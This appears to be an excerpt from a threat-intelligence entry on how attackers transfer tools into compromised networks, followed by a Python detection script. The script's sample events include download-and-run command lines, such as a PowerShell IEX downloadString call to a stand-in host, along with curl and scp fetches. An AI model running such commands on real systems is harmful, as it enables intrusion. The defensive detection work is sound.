Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp. Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e.

On Windows, adversaries may use various utilities to download tools, such as copy, finger, certutil, and PowerShell commands such as IEX(New-Object Net.WebClient).downloadString() and Invoke-WebRequest. On Linux and macOS systems, a variety of utilities also exist, such as curl, scp, sftp, tftp, rsync, finger, and wget.

Adversaries may also abuse installers and package managers, such as yum or winget, to download tools to victim hosts.

Files can also be transferred using various Web Services as well as native or otherwise present tools on the victim system. In some cases, adversaries may be able to leverage services that sync between a web-based and an on-premises client, such as Dropbox or OneDrive, to transfer files onto victim systems. For example, by compromising a cloud account and logging into the service's web portal, an adversary may be able to trigger an automatic syncing process that transfers the file onto the victim's machine.

During the 2015 Ukraine Electric Power Attack, Sandworm Team pushed additional malicious tools onto an infected system to steal user credentials, move laterally, and destroy data. ABK has the ability to download files from C2. Action RAT has the ability to download additional payloads onto an infected machine. Agent Tesla can download additional files for execution on the victim’s machine. Agent.btz attempts to download an encrypted binary from a specified domain. Ajax Security Team has used Wrapper/Gholee, custom-developed malware, which downloaded additional malware to the infected system. Amadey can download and execute files to further infect a host machine with additional malware.
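A detection-side view of the utilities listed above, as an added example that is not part of the original page: it flags process command lines in which one of the named tools references a remote source. The event tuples are constructed samples, and the remote-source patterns (URL, user@host:path, UNC path) and the function names are assumptions of this sketch.

```python
import re

# Utilities the text names as download-capable (lowercase, no ".exe").
TOOLS = {"copy", "finger", "certutil", "powershell", "curl", "scp",
         "sftp", "tftp", "rsync", "wget"}
# PowerShell download primitives named in the text.
PS_PRIMITIVES = re.compile(r"downloadstring|invoke-webrequest", re.I)
# Assumed remote-source shapes: URL, user@host:path, or UNC path.
REMOTE = re.compile(
    r"(?:https?|ftp|tftp|sftp)://[^\s'\"()]+"
    r"|[\w.-]+@[\w.-]+:\S+"
    r"|\\\\[\w.-]+\\\S+", re.I)

# Constructed sample events: (host, process command line).
EVENTS = [
    ("ws01", r"powershell.exe -Command IEX(New-Object Net.WebClient)"
             r".downloadString('http://files.example.invalid/a.ps1')"),
    ("ws01", "certutil.exe -hashfile report.bin SHA256"),  # local only
    ("web02", "/usr/bin/curl -o /tmp/t https://files.example.invalid/t"),
    ("web02", "scp ops@198.51.100.7:/srv/tool /tmp/tool"),
    ("ws03", r"cmd.exe /c copy \\fs.example.invalid\share\t.exe C:\Temp\t.exe"),
    ("ws03", r"notepad.exe C:\notes.txt"),
]

def classify(cmdline):
    """Return (tool, remote) when a named utility references a remote source."""
    remote = REMOTE.search(cmdline)
    if not remote:
        return None  # a utility name alone is not a transfer
    prim = PS_PRIMITIVES.search(cmdline)
    if prim:
        return prim.group(0).lower(), remote.group(0)
    for token in cmdline.split():
        if REMOTE.match(token):
            continue  # do not read a tool name out of the URL itself
        name = re.split(r"[\\/]", token.strip("\"'"))[-1].lower()
        if name.removesuffix(".exe") in TOOLS:
            return name.removesuffix(".exe"), remote.group(0)
    return None

def find_ingress_transfers(events):
    """Collect (host, tool, remote) for every event that classifies."""
    return [(host, *hit) for host, cmdline in events
            if (hit := classify(cmdline))]

if __name__ == "__main__":
    for row in find_ingress_transfers(EVENTS):
        print(row)
```

Package managers and sync clients such as yum, winget, Dropbox or OneDrive are not covered by this check, because their command lines do not name the remote source.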